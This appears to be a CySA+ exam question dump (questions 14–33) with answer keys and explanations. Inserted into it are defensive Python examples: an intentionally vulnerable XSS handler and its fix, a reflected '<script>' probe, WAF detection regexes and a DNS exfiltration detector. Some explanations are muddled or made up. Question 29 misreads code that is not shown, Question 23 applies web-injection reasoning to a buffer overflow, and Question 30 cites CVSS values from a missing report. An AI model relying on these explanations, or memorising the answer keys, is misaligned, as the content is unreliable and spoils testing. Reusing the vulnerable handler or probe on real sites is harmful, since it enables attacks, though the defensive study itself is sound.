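What "response is tainted" means in code, as an added example that is not the scanned search.aspx or any code from the page: a constructed search handler that reflects the query verbatim with a bare text/html content type, beside a hardened version that output-encodes the reflected value and sends the response headers the explanation names (Content-Type with an explicit charset and a Content-Security-Policy, plus X-Content-Type-Options). The taint check mirrors what a scanner does: submit a probe and see whether it comes back un-encoded.

```python
"""Reflected-input handler before and after XSS hardening, with a scanner-style taint check (added example)."""
import html

PROBE = "<script>alert(1)</script>"  # constructed probe string, stands in for the scanner's payload


def render_search_vulnerable(query):
    """'Before' (constructed, illustrative): raw query echoed into HTML, no protective headers."""
    headers = {"Content-Type": "text/html"}
    body = f"<h1>Results for: {query}</h1>"
    return headers, body


def render_search_hardened(query):
    """'After': output encoding on the reflected value plus the response headers the explanation names."""
    headers = {
        "Content-Type": "text/html; charset=utf-8",        # explicit MIME type and charset
        "Content-Security-Policy":                          # only same-origin scripts may run
            "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
        "X-Content-Type-Options": "nosniff",                # no MIME sniffing into executable content
    }
    body = f"<h1>Results for: {html.escape(query, quote=True)}</h1>"
    return headers, body


REQUIRED_HEADERS = ("Content-Security-Policy", "X-Content-Type-Options")


def missing_xss_headers(headers):
    """Headers a scanner would expect; a text/html type without a charset is reported as well."""
    missing = [name for name in REQUIRED_HEADERS if name not in headers]
    if "charset=" not in headers.get("Content-Type", ""):
        missing.append("Content-Type charset")
    return missing


def payload_reflected_verbatim(render, payload=PROBE):
    """Scanner-style taint check: does the exact probe come back in the body un-encoded?"""
    _, body = render(payload)
    return payload in body


if __name__ == "__main__":
    for name, render in (("vulnerable", render_search_vulnerable), ("hardened", render_search_hardened)):
        headers, _ = render("test")
        print(f"{name:10s} tainted={payload_reflected_verbatim(render)} "
              f"missing_headers={missing_xss_headers(headers)}")
```

The encoding step is what stops the injected markup from executing; the headers are defence in depth, and the CSP in particular would also block an inline script that slipped past encoding elsewhere in the page.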

QUESTION 14
An organization discovered a data breach that resulted in PII being released to the public. During the
lessons learned review, the panel identified discrepancies regarding who was responsible for external
reporting, as well as the timing requirements. Which of the following actions would best address the
reporting issue?
A. Creating a playbook denoting specific SLAs and containment actions per incident type
B. Researching federal laws, regulatory compliance requirements, and organizational policies to
document specific reporting SLAs
C. Defining which security incidents require external notifications and incident reporting in addition to
internal stakeholders
D. Designating specific roles and responsibilities within the security team and stakeholders to streamline
tasks

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: Researching federal laws, regulatory compliance requirements, and organizational policies to
document specific reporting SLAs is the best action to address the reporting issue. Reporting SLAs are
service level agreements that specify the time frame and the format for notifying the relevant authorities
and the affected individuals of a data breach. Reporting SLAs may vary depending on the type and
severity of the breach, the type and location of the data, the industry and jurisdiction of the organization,
and the internal policies of the organization. By researching and documenting the reporting SLAs for
different scenarios, the organization can ensure that it complies with the legal and ethical obligations of
data breach notification, and avoid any penalties, fines, or lawsuits that may result from failing to report a
breach in a timely and appropriate manner [1][2]. References: When and how to report a breach: Data breach
reporting best practices, Incident and Breach Management

QUESTION 15
When undertaking a cloud migration of multiple SaaS applications, an organization's system administrator
struggled ... identity and access management to cloud-based assets. Which of the following service
models would have reduced the complexity of this project?

A. CASB
B. SASE
C. ZTNA
D. SWG

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: A Cloud Access Security Broker (CASB) would have reduced the complexity of identity and
access management in cloud-based assets. CASBs provide visibility into cloud application usage, data
protection, and governance for cloud-based services.

QUESTION 16
Two employees in the finance department installed a freeware application that contained embedded
malware. The network is robustly segmented based on areas of responsibility. These computers had
critical sensitive information stored locally that needs to be recovered. The department manager advised
all department employees to turn off their computers until the security team could be contacted about the
issue. Which of the following is the first step the incident response staff members should take when they
arrive?

A. Turn on all systems, scan for infection, and back up data to a USB storage device.
B. Identify and remove the software installed on the impacted systems in the department.
C. Explain that malware cannot truly be removed and then reimage the devices.
D. Log on to the impacted systems with an administrator account that has privileges to perform backups.
E. Segment the entire department from the network and review each computer offline.

Correct Answer: E
Explanation

Explanation/Reference:
Segmenting the entire department from the network and reviewing each computer offline is the first step
the incident response staff members should take when they arrive. This step can help contain the malware
infection and prevent it from spreading to other systems or networks. Reviewing each computer offline can
help identify the source and scope of the infection, and determine the best course of action for recovery [1][2].
Turning on all systems, scanning for infection, and backing up data to a USB storage device is a risky step,
as it can activate the malware and cause further damage or data loss. It can also compromise the USB
storage device and any other system that connects to it. Identifying and removing the software installed on
the impacted systems in the department is a possible step, but it should be done after segmenting the
department from the network and reviewing each computer offline. Explaining that malware cannot truly be
removed and then reimaging the devices is a drastic step, as it can result in data loss and downtime. It
should be done only as a last resort, and after backing up the data and verifying its integrity. Logging on to
the impacted systems with an administrator account that has privileges to perform backups is a dangerous
step, as it can expose the administrator credentials and privileges to the malware, and allow it to escalate
its access and capabilities [3][4]. References: Incident Response: Processes, Best Practices & Tools -
Atlassian, Incident Response Best Practices | SANS Institute, Malware Removal: How to Remove Malware
from Your Device, How to Remove Malware From Your PC | PCMag

QUESTION 17
After updating the email client to the latest patch, only about 15% of the workforce is able to use email.
Windows 10 users do not experience issues, but Windows 11 users have constant issues. Which of the
following did the change management team fail to do?

A. Implementation
B. Testing
C. Rollback
D. Validation

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: Testing is a crucial step in any change management process, as it ensures that the change is
compatible with the existing systems and does not cause any errors or disruptions. In this case, the
change management team failed to test the email client patch on Windows 11 devices, which resulted in a
widespread issue for the users. Testing would have revealed the problem before the patch was deployed,
and allowed the team to fix it or postpone the change. References: 7 Reasons Why Change Management
Strategies Fail and How to Avoid Them, CompTIA CySA+ CS0-003 Certification Study Guide

QUESTION 18
Which of the following is the most important reason for an incident response team to develop a formal
incident declaration?

A. To require that an incident be reported through the proper channels
B. To identify and document staff who have the authority to declare an incident
C. To allow for public disclosure of a security event impacting the organization
D. To establish the department that is responsible for responding to an incident

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: The formal incident declaration is crucial to identify and document the staff who have the
authority to declare an incident, ensuring that incidents are handled by authorized personnel. References:
CompTIA CySA+ Study Guide:
Exam CS0-003, 3rd Edition, Chapter 5: Incident Response, page 197.

QUESTION 19
While performing a dynamic analysis of a malicious file, a security analyst notices the memory address
changes every time the process runs. Which of the following controls is most likely preventing the analyst
from finding the proper memory address of the piece of malicious code?
A. Address space layout randomization
B. Data execution prevention
C. Stack canary
D. Code obfuscation

Correct Answer: A
Explanation

Explanation/Reference:
The correct answer is A. Address space layout randomization.

Address space layout randomization (ASLR) is a security control that randomizes the memory address
space of a process, making it harder for an attacker to exploit memory-based vulnerabilities, such as
buffer overflows [1]. ASLR can also prevent a security analyst from finding the proper memory address of a
piece of malicious code, as the memory address changes every time the process runs [2]. The other options
are not the best explanations for why the memory address changes every time the process runs. Data
execution prevention (B) is a security control that prevents code from being executed in certain memory
regions, such as the stack or the heap [3]. Stack canary (C) is a security technique that places a random value
on the stack before a function's return address, to detect and prevent stack buffer overflows. Code
obfuscation (D) is a technique that modifies the source code or binary of a program to make it more difficult
to understand or reverse engineer. These techniques do not affect the memory address space of a
process, but rather the execution or analysis of the code.
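One way an analyst can confirm that the moving addresses are ASLR rather than something the sample does itself is to capture /proc/<pid>/maps from two runs and compare the base of each mapping. The following is an added example (not code from the exam guide); the two maps listings are constructed samples for a hypothetical binary at /opt/sample/malware.bin, and the randomize_va_space check only works on Linux:

```python
"""Confirm that address churn between runs of a sample is caused by ASLR.

Compares the memory layout of two runs (captured from /proc/<pid>/maps)
and reports which mappings changed base address. Also reads the kernel's
ASLR setting when it is available.
"""
import os
import re
from typing import Dict, Optional, Tuple

# One /proc/<pid>/maps line: "start-end perms offset dev inode [pathname]"
_MAPS_RE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>\S+)\s+\S+\s+\S+\s+\S+\s*(?P<path>.*)$"
)


def parse_maps(text: str) -> Dict[str, int]:
    """Return {pathname: lowest start address} for each named mapping."""
    bases: Dict[str, int] = {}
    for line in text.splitlines():
        m = _MAPS_RE.match(line.strip())
        if not m or not m.group("path"):
            continue  # anonymous mappings carry no name to match on
        path = m.group("path")
        start = int(m.group("start"), 16)
        bases[path] = min(start, bases.get(path, start))
    return bases


def compare_runs(maps_a: str, maps_b: str) -> Dict[str, Tuple[int, int, bool]]:
    """For mappings present in both runs, report (base_a, base_b, moved)."""
    a, b = parse_maps(maps_a), parse_maps(maps_b)
    return {p: (a[p], b[p], a[p] != b[p]) for p in a if p in b}


def aslr_setting() -> Optional[int]:
    """Linux only: 0 = off, 1 = stack/mmap/vdso randomized, 2 = also brk (heap)."""
    path = "/proc/sys/kernel/randomize_va_space"
    if not os.path.exists(path):
        return None
    with open(path) as f:
        return int(f.read().strip())


# Constructed sample: two runs of the same PIE binary, trimmed to a few lines.
RUN_1 = """\
55d1c2a00000-55d1c2a01000 r--p 00000000 08:01 1234 /opt/sample/malware.bin
55d1c2a01000-55d1c2a02000 r-xp 00001000 08:01 1234 /opt/sample/malware.bin
55d1c3f10000-55d1c3f31000 rw-p 00000000 00:00 0 [heap]
7f8e4a200000-7f8e4a3c0000 r-xp 00000000 08:01 5678 /usr/lib/x86_64-linux-gnu/libc.so.6
7ffd3e5a0000-7ffd3e5c1000 rw-p 00000000 00:00 0 [stack]
"""
RUN_2 = """\
5625f7c00000-5625f7c01000 r--p 00000000 08:01 1234 /opt/sample/malware.bin
5625f7c01000-5625f7c02000 r-xp 00001000 08:01 1234 /opt/sample/malware.bin
5625f9a40000-5625f9a61000 rw-p 00000000 00:00 0 [heap]
7f1b2c700000-7f1b2c8c0000 r-xp 00000000 08:01 5678 /usr/lib/x86_64-linux-gnu/libc.so.6
7ffee1100000-7ffee1121000 rw-p 00000000 00:00 0 [stack]
"""

if __name__ == "__main__":
    print("randomize_va_space =", aslr_setting())
    for path, (a, b, moved) in compare_runs(RUN_1, RUN_2).items():
        print(f"{path:45s} {a:#016x} -> {b:#016x} {'MOVED' if moved else 'same'}")
```

When every named region (binary, heap, shared libraries, stack) moves between runs, the sandbox's ASLR is the cause; if only the sample's own allocations move while the binary stays put, look at the sample instead.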

QUESTION 20
A small company does not have enough staff to effectively segregate duties to prevent error and fraud in
payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs
and audit trails to mitigate risk.
Which of the following did the CISO implement?

A. Corrective controls
B. Compensating controls
C. Operational controls
D. Administrative controls

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: Compensating controls are alternative controls that provide a similar level of protection as the
original controls, but are used when the original controls are not feasible or cost-effective. In this case, the
CISO implemented compensating controls by reviewing logs and audit trails to mitigate the risk of error and
fraud in payroll management, since segregating duties was not possible due to the small staff size.

QUESTION 21
Which of the following most accurately describes the Cyber Kill Chain methodology?

A. It is used to correlate events to ascertain the TTPs of an attacker.
B. It is used to ascertain lateral movements of an attacker, enabling the process to be stopped.
C. It provides a clear model of how an attacker generally operates during an intrusion and the actions to
take at each stage.
D. It outlines a clear path for determining the relationships between the attacker, the technology used, and
the target.

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: The Cyber Kill Chain methodology provides a clear model of how an attacker generally
operates during an intrusion and the actions to take at each stage. It is divided into seven stages:
reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on
objectives. It helps network defenders understand and prevent cyberattacks by identifying the attacker's
objectives and tactics. References:
The Cyber Kill Chain: The Seven Steps of a Cyberattack

QUESTION 22
The management team requests monthly KPI reports on the company's cybersecurity program. Which of
the following KPIs would identify how long a security threat goes unnoticed in the environment?

A. Employee turnover
B. Intrusion attempts
C. Mean time to detect
D. Level of preparedness

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: Mean time to detect (MTTD) is a metric that measures the average time it takes for an
organization to discover or detect an incident. It is a key performance indicator in incident management
and a measure of incident response capabilities. A low MTTD indicates that the organization can quickly
identify security threats and minimize their impact [1][2].
References: What Is MTTD (Mean Time to Detect)? A Detailed Explanation, Introduction to MTTD: Mean
Time to Detect

QUESTION 23
During a security test, a security analyst found a critical application with a buffer overflow vulnerability.
Which of the following would be best to mitigate the vulnerability at the application level?

A. Perform OS hardening.
B. Implement input validation.
C. Update third-party dependencies.
D. Configure address space layout randomization.

Correct Answer: B
Explanation

Explanation/Reference:
Implementing input validation is the best way to mitigate the buffer overflow vulnerability at the application
level. Input validation is a technique that checks the data entered by users or attackers against a set of
rules or constraints, such as data type, length, format, or range. Input validation can prevent common web
application attacks such as SQL injection, cross-site scripting (XSS), or command injection, which exploit
the lack of input validation to execute malicious code or commands on the server or the client side. By
validating the input before allowing submission, the web application can reject or sanitize any malicious or
unexpected input, and protect the application from being compromised [1][2]. References:
How to detect, prevent, and mitigate buffer overflow attacks - Synopsys, How to mitigate buffer overflow
vulnerabilities | Infosec

QUESTION 24
A SOC manager is establishing a reporting process to manage vulnerabilities. Which of the following would
be the best solution to identify potential loss incurred by an issue?

A. Trends
B. Risk score
C. Mitigation
D. Prioritization

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: A risk score is a numerical value that represents the potential impact and likelihood of a
vulnerability being exploited. It can help to identify the potential loss incurred by an issue and prioritize
remediation efforts accordingly.
https://www.comptia.org/training/books/cysa-cs0-003-study-guide

QUESTION 25
A software developer has been deploying web applications with common security risks to include
insufficient logging capabilities. Which of the following actions would be most effective to reduce risks
associated with the application development?

A. Perform static analyses using an integrated development environment.
B. Deploy compensating controls into the environment.
C. Implement server-side logging and automatic updates.
D. Conduct regular code reviews using OWASP best practices.

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: Conducting regular code reviews using OWASP best practices is the most effective action to
reduce risks associated with the application development. Code reviews are a systematic examination of
the source code of an application to detect and fix errors, vulnerabilities, and weaknesses that may
compromise the security, functionality, or performance of the application. Code reviews can help to
improve the quality and security of the code, as well as to identify and remediate common security risks,
such as insufficient logging capabilities. OWASP (Open Web Application Security Project) is a global
nonprofit organization that provides free and open resources, tools, standards, and best practices for web
application security. OWASP best practices for logging include following a common logging format and
approach, logging relevant security events and data, protecting log data from unauthorized access or
modification, and using log analysis and monitoring tools to detect and respond to security incidents. By
following OWASP best practices for logging, developers can ensure that their web applications have
sufficient and effective logging capabilities that can help to prevent, detect, and mitigate security threats.
References: OWASP Logging Cheat Sheet, OWASP Logging Guide, C9: Implement Security Logging and
Monitoring - OWASP Foundation

QUESTION 26
A cybersecurity analyst is recording the following details

* ID

* Name

* Description

* Classification of information

* Responsible party

In which of the following documents is the analyst recording this information?

A. Risk register
B. Change control documentation
C. Incident response playbook
D. Incident response plan

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: A risk register typically contains details such as ID, name, description, classification of
information, and responsible party. It is used to identify, assess, manage, and monitor risks within an
organization, and to track the risks that have been identified. It is not directly related to incident response
or change control documentation.

QUESTION 27
An XSS vulnerability was reported on one of the non-sensitive/non-mission-critical public websites of a
company. The security department confirmed the finding and needs to provide a recommendation to the
application owner. Which of the following recommendations will best prevent this vulnerability from being
exploited? (Select two).

A. Implement an IPS in front of the web server.
B. Enable MFA on the website.
C. Take the website offline until it is patched.
D. Implement a compensating control in the source code.
E. Configure TLS v1.3 on the website.
F. Fix the vulnerability using a virtual patch at the WAF.

Correct Answer: DF
Explanation

Explanation/Reference:
The best recommendations to prevent an XSS vulnerability from being exploited are to implement a
compensating control in the source code and to fix the vulnerability using a virtual patch at the WAF. A
compensating control is a technique that mitigates the risk of a vulnerability by adding additional security
measures, such as input validation, output encoding, or HTML sanitization. A virtual patch is a rule that
blocks or modifies malicious requests or responses at the WAF level, without modifying the application
code. These recommendations are effective, efficient, and less disruptive than the other options.
References: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 4:
Security Operations and Monitoring, page 156; Cross Site Scripting Prevention Cheat Sheet, Section: XSS
Defense Philosophy.
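The two recommended mitigations side by side, as an added example in Python (not code from the exam guide or from any product): the compensating control in the source code is contextual output encoding of the reflected parameter, and the virtual patch is a request-level rule of the kind a WAF would apply while the code fix is rolled out. The template, the search parameter and the three WAF patterns are assumptions made for the example; a real WAF rule set is far larger, which is why the page treats the virtual patch as a stopgap rather than the fix.

```python
"""Reflected XSS: vulnerable rendering, output encoding, and a WAF-style rule."""
import html
import re

# Assumed page fragment: the search term is reflected in a text node and an attribute.
TEMPLATE = '<p>Results for: <b>{q}</b></p><input name="q" value="{attr}">'


def render_vulnerable(query: str) -> str:
    """Before: untrusted input is interpolated straight into the HTML."""
    return TEMPLATE.format(q=query, attr=query)


def render_hardened(query: str) -> str:
    """After: encode for the HTML body and, separately, for the quoted attribute."""
    body = html.escape(query, quote=False)   # & < > suffice inside a text node
    attr = html.escape(query, quote=True)    # also encode " and ' inside attributes
    return TEMPLATE.format(q=body, attr=attr)


# Illustrative virtual-patch patterns (assumed for this example, not a product rule set).
_WAF_PATTERNS = [
    re.compile(r"<\s*/?\s*(script|iframe|object|embed)\b", re.I),  # active elements
    re.compile(r"\bon[a-z]+\s*=", re.I),                           # inline event handlers
    re.compile(r"javascript\s*:", re.I),                           # javascript: URLs
]


def waf_allows(query: str) -> bool:
    """Virtual patch: reject the request when any pattern matches the parameter."""
    return not any(p.search(query) for p in _WAF_PATTERNS)


def contains_markup(rendered: str, needle: str = "<script") -> bool:
    """Check whether a payload survived rendering as live markup."""
    return needle.lower() in rendered.lower()


if __name__ == "__main__":
    sample = '<script>alert(1)</script>'  # textbook test string, constructed
    print("vulnerable:", render_vulnerable(sample))
    print("hardened  :", render_hardened(sample))
    print("waf allows:", waf_allows(sample))
```

Encoding is applied at output time and per context, which is the OWASP cheat sheet's core rule; the WAF rule, by contrast, can only catch shapes it has been told about, so it buys time but does not remove the vulnerability.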

QUESTION 28
During a recent site survey, an analyst discovered a rogue wireless access point on the network. Which of
the following actions should be taken first to protect the network while preserving evidence?

A. Run a packet sniffer to monitor traffic to and from the access point.
B. Connect to the access point and examine its log files.
C. Identify who is connected to the access point and attempt to find the attacker.
D. Disconnect the access point from the network.

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: The correct answer is D. Disconnect the access point from the network.

A rogue access point is a wireless access point that has been installed on a network without the
authorization or knowledge of the network administrator. A rogue access point can pose a serious security
risk, as it can allow unauthorized users to access the network, intercept network traffic, or launch attacks
against the network or its devices [1][2][3][4]. The first action that should be taken to protect the network while
preserving evidence is to disconnect the rogue access point from the network. This will prevent any further
damage or compromise of the network by blocking the access point from communicating with other
devices or users. Disconnecting the rogue access point will also preserve its state and configuration, which
can be useful for forensic analysis and investigation. Disconnecting the rogue access point can be done
physically by unplugging it from the network port or wirelessly by disabling its radio frequency [5].
The other options are not the best actions to take first, as they may not protect the network or preserve
evidence effectively.
Option A is not the best action to take first, as running a packet sniffer to monitor traffic to and from the
access point may not stop the rogue access point from causing harm to the network. A packet sniffer is a
tool that captures and analyzes network packets, which are units of data that travel across a network. A
packet sniffer can be useful for identifying and troubleshooting network problems, but it may not be able to
prevent or block malicious traffic from a rogue access point. Moreover, running a packet sniffer may
require additional time and resources, which could delay the response and mitigation of the incident [5].
Option B is not the best action to take first, as connecting to the access point and examining its log files
may not protect the network or preserve evidence. Connecting to the access point may expose the
analyst's device or credentials to potential attacks or compromise by the rogue access point. Examining its
log files may provide some information about the origin and activity of the rogue access point, but it may
also alter or delete some evidence that could be useful for forensic analysis and investigation.
Furthermore, connecting to the access point and examining its log files may not prevent or stop the rogue
access point from continuing to harm the network [5]. Option C is not the best action to take first, as
identifying who is connected to the access point and attempting to find the attacker may not protect the
network or preserve evidence. Identifying who is connected to the access point may require additional
tools or techniques, such as scanning for wireless devices or analyzing network traffic, which could take
time and resources away from responding and mitigating the incident. Attempting to find the attacker may
also be difficult or impossible, as the attacker may use various methods to hide their identity or location,
such as encryption, spoofing, or proxy servers. Moreover, identifying who is connected to the access point
and attempting to find the attacker may not prevent or stop the rogue access point from causing further
damage or compromise to the network [5].
References:
1 CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives
2 Cybersecurity Analyst+ - CompTIA
3 CompTIA CySA+ CS0-002 Certification Study Guide
4 CertMaster Learn for CySA+ Training - CompTIA
5 How to Protect Against Rogue Access Points on Wi-Fi - Byos
6 Wireless Access Point Protection: 5 Steps to Find Rogue Wi-Fi Networks ...
7 Rogue Access Point - Techopedia
8 Rogue access point - Wikipedia
9 What is a Rogue Access Point (Rogue AP)? - Contextual Security

QUESTION 29
A company brings in a consultant to make improvements to its website. After the consultant leaves, a web
developer notices unusual activity on the website and submits a suspicious file containing the following
code to the security team:

Which of the following did the consultant do?

A. Implanted a backdoor
B. Implemented privilege escalation
C. Implemented clickjacking
D. Patched the web server

Correct Answer: A
Explanation

Explanation/Reference:
The correct answer is A. Implanted a backdoor.

A backdoor is a method that allows an unauthorized user to access a system or network without the
permission or knowledge of the owner. A backdoor can be installed by exploiting a software vulnerability,
by using malware, or by physically modifying the hardware or firmware of the device. A backdoor can be
used for various malicious purposes, such as stealing data, installing malware, executing commands, or
taking control of the system. In this case, the consultant implanted a backdoor in the website by using an
HTML and PHP code snippet that displays an image of a shutdown button and an alert message that says
"Exit". However, the code also echoes the remote address of the server, which means that it sends the IP
address of the visitor to the attacker. This way, the attacker can identify and target the visitors of the
website and use their IP addresses to launch further attacks or gain access to their devices.
The code snippet is an example of a clickjacking attack, which is a type of interface-based attack that tricks
a user into clicking on a hidden or disguised element on a webpage. However, clickjacking is not the main
goal of the consultant, but rather a means to implant the backdoor. Therefore, option C is incorrect.
Option B is also incorrect because privilege escalation is an attack technique that allows an attacker to
gain higher or more permissions than they are supposed to have on a system or network. Privilege
escalation can be achieved by exploiting a software vulnerability, by using malware, or by abusing
misconfigurations or weak access controls. However, there is no evidence that the consultant implemented
privilege escalation on the website or gained any elevated privileges.
Option D is also incorrect because patching is a process of applying updates to software to fix errors,
improve performance, or enhance security. Patching can prevent or mitigate various types of attacks, such
as exploits, malware infections, or denial-of-service attacks. However, there is no indication that the
consultant patched the web server or improved its security in any way.
References:
1 What Is a Backdoor & How to Prevent Backdoor Attacks (2023)
2 What is Clickjacking? Tutorial & Examples | Web Security Academy
3 What Is Privilege Escalation and How It Relates to Web Security | Acunetix
4 What Is Patching? | Best Practices For Patch Management - cWatch Blog

QUESTION 30
An analyst is evaluating the following vulnerability report:
Which of the following vulnerability report sections provides information about the level of impact on data
confidentiality if a successful exploitation occurs?

A. Payloads
B. Metrics
C. Vulnerability
D. Profile

Correct Answer: B
Explanation

Explanation/Reference:
The correct answer is B. Metrics.

The Metrics section of the vulnerability report provides information about the level of impact on data
confidentiality if a successful exploitation occurs. The Metrics section contains the CVE dictionary entry
and the CVSS base score of the vulnerability. CVE stands for Common Vulnerabilities and Exposures and
it is a standardized system for identifying and naming vulnerabilities. CVSS stands for Common
Vulnerability Scoring System and it is a standardized system for measuring and rating the severity of
vulnerabilities. The CVSS base score is a numerical value between 0 and 10 that reflects the intrinsic
characteristics of a vulnerability, such as its exploitability, impact, and scope. CVSS as a whole is
composed of three metric groups: Base, Temporal, and Environmental. The Base metric group captures
the characteristics of a vulnerability that are constant over time and across user environments. The Base
metric group consists of six metrics: Attack Vector, Attack Complexity, Privileges Required, User
Interaction, Scope, and Impact. The Impact metric measures the effect of a vulnerability on the
confidentiality, integrity, and availability of the affected resources. In this case, the CVSS base score of the
vulnerability is 9.8, which indicates a critical severity level. The Impact metric of the CVSS base score is
6.0, which indicates a high impact on confidentiality, integrity, and availability. Therefore, the Metrics
section provides information about the level of impact on data confidentiality if a successful exploitation
occurs.
The other sections of the vulnerability report do not provide information about the level of impact on data
confidentiality if a successful exploitation occurs. The Payloads section contains links to request and
response payloads that demonstrate how the vulnerability can be exploited. The Payloads section can help
an analyst to understand how the attack works, but it does not provide a quantitative measure of the
impact. The Vulnerability section contains information about the type, group, and description of the
vulnerability. The Vulnerability section can help an analyst to identify and classify the vulnerability, but it
does not provide a numerical value of the impact. The Profile section contains information about the
authentication, times viewed, and aggressiveness of the vulnerability. The Profile section can help an
analyst to assess the risk and priority of the vulnerability, but it does not provide a specific measure of the
impact on data confidentiality.
References:
[1] CVE - Common Vulnerabilities and Exposures (CVE)
[2] Common Vulnerability Scoring System SIG
[3] CVSS v3.1 Specification Document
[4] CVSS v3.1 User Guide
[5] How to Read a Vulnerability Report - Security Boulevard

QUESTION 31
A security analyst has found the following suspicious DNS traffic while analyzing a packet capture:

DNS traffic while a tunneling session is active.
The mean time between queries is less than one second.
The average query length exceeds 100 characters.

Which of the following attacks most likely occurred?

A. DNS exfiltration
B. DNS spoofing
C. DNS zone transfer
D. DNS poisoning

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: DNS exfiltration is a technique that uses the DNS protocol to transfer data from a
compromised network or device to an attacker-controlled server. DNS exfiltration can bypass firewall rules
and security products that do not inspect DNS traffic. The characteristics of the suspicious DNS traffic in
the question match the indicators of DNS exfiltration, such as:
DNS traffic while a tunneling session is active: This implies that the DNS protocol is being used to create a
covert channel for data transfer. The mean time between queries is less than one second: This implies that
the DNS queries are being sent at a high frequency to maximize the amount of data transferred.
The average query length exceeds 100 characters: This implies that the DNS queries are encoding large
amounts of data in the subdomains or other fields of the DNS packets.
Official References:
https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002-exam-objectives
https://resources.infosecinstitute.com/topic/bypassing-security-products-via-dns-data-exfiltration/
https://www.reddit.com/r/CompTIA/comments/nvjuzt/dns_exfiltration_explanation/
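The two indicators from the question (mean time between queries under one second, mean query length over 100 characters) can be turned directly into a per-client detection. The following is an added example (not from the exam guide): it takes (timestamp, client, query name) records such as a resolver log or passive DNS sensor would produce, profiles each client, and flags the ones matching both indicators. The records, the client addresses and the exfil.example.net domain are constructed for the example; the thresholds are the ones stated on the page.

```python
"""Per-client DNS exfiltration heuristic: query rate and query-name length."""
from collections import defaultdict
from dataclasses import dataclass
from statistics import mean
from typing import Dict, List, Tuple

MAX_MEAN_GAP_SECONDS = 1.0    # indicator 1: queries arrive, on average, faster than this
MIN_MEAN_QNAME_LENGTH = 100   # indicator 2: average QNAME longer than this
MIN_QUERIES = 5               # ignore clients with too few queries to judge


@dataclass
class ClientStats:
    queries: int
    mean_gap: float      # seconds between consecutive queries
    mean_length: float   # characters per QNAME
    suspicious: bool


def profile_clients(records: List[Tuple[float, str, str]]) -> Dict[str, ClientStats]:
    """Group (timestamp, client, qname) records by client and compute both indicators."""
    by_client: Dict[str, List[Tuple[float, str]]] = defaultdict(list)
    for ts, client, qname in records:
        by_client[client].append((ts, qname))
    out: Dict[str, ClientStats] = {}
    for client, rows in by_client.items():
        rows.sort()
        times = [t for t, _ in rows]
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean_gap = mean(gaps) if gaps else float("inf")
        mean_len = mean(len(q) for _, q in rows)
        out[client] = ClientStats(
            queries=len(rows),
            mean_gap=mean_gap,
            mean_length=mean_len,
            suspicious=(len(rows) >= MIN_QUERIES
                        and mean_gap < MAX_MEAN_GAP_SECONDS
                        and mean_len > MIN_MEAN_QNAME_LENGTH),
        )
    return out


def flagged_clients(records: List[Tuple[float, str, str]]) -> List[str]:
    """Clients that match both indicators, sorted for stable output."""
    return sorted(c for c, s in profile_clients(records).items() if s.suspicious)


def _tunnel_qname(i: int) -> str:
    # Constructed: long hex labels under an attacker-controlled domain, as a tunnel would emit.
    chunk = ("%032x" % (i * 0x9E3779B97F4A7C15)) * 3   # 96 hex characters
    return f"{chunk[:60]}.{chunk[60:]}.t{i}.exfil.example.net"


# Constructed sample: one host querying every 0.2 s with long names, one browsing normally.
SAMPLE_RECORDS = (
    [(1000.0 + i * 0.2, "10.0.0.7", _tunnel_qname(i)) for i in range(20)]
    + [(1000.0 + i * 45.0, "10.0.0.9", n) for i, n in enumerate(
        ["www.example.com", "mail.example.com", "cdn.example.org",
         "api.example.com", "login.example.net", "static.example.org"])]
)

if __name__ == "__main__":
    for client, s in profile_clients(SAMPLE_RECORDS).items():
        print(f"{client:10s} n={s.queries:3d} gap={s.mean_gap:7.2f}s "
              f"len={s.mean_length:6.1f} {'SUSPICIOUS' if s.suspicious else 'ok'}")
```

In production the same two numbers would be computed per client over a sliding window, with an allow-list for legitimate high-rate DNS users such as resolvers and mail gateways, and the flagged client's query names kept as evidence of what was encoded.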

QUESTION 32
A security analyst detects an email server that had been compromised in the internal network. Users have
been reporting strange messages in their email inboxes and unusual network traffic. Which of the following
incident response steps should be performed next?

A. Preparation
B. Validation
C. Containment
D. Eradication

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: After detecting a compromised email server and unusual network traffic, the next step in
incident response is containment, to prevent further damage or spread of the compromise. References:
CompTIA CySA+ Study Guide:
Exam CS0-003, 3rd Edition, Chapter 5: Incident Response, page 197.

QUESTION 33
A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and
the host under investigation are off by 43 minutes. Which of the following is the most likely scenario
occurring with the time stamps?

A. The NTP server is not configured on the host.
B. The cybersecurity analyst is looking at the wrong information.
C. The firewall is using UTC time.
D. The host with the logs is offline.

Correct Answer: A
Explanation

Explanation/Reference:
The most likely scenario occurring with the time stamps is that the NTP server is not configured on the
host. NTP is the Network Time Protocol, which is used to synchronize the clocks of computers over a
network. NTP uses a hierarchical system of time sources, where each level is assigned a stratum number.
The most accurate time sources, such as atomic clocks or GPS receivers, are at stratum 0, and the
devices that synchronize with them are at stratum 1, and so on. NTP clients can query multiple NTP
servers and use algorithms to select the best time source and adjust their clocks accordingly [1]. If the NTP
server is not configured on the host, the host will rely on its own hardware clock, which may drift over time
and become inaccurate. This can cause discrepancies in the time stamps between the host and other
devices on the network, such as the firewall, which may be synchronized with a different NTP server or use
a different time zone. This can affect the security analysis and correlation of events, as well as the
compliance and auditing of the network [2][3]. References: How the Windows Time Service Works, Time
Synchronization - All You Need To Know, Firewall rules logging: a closer look at our new network
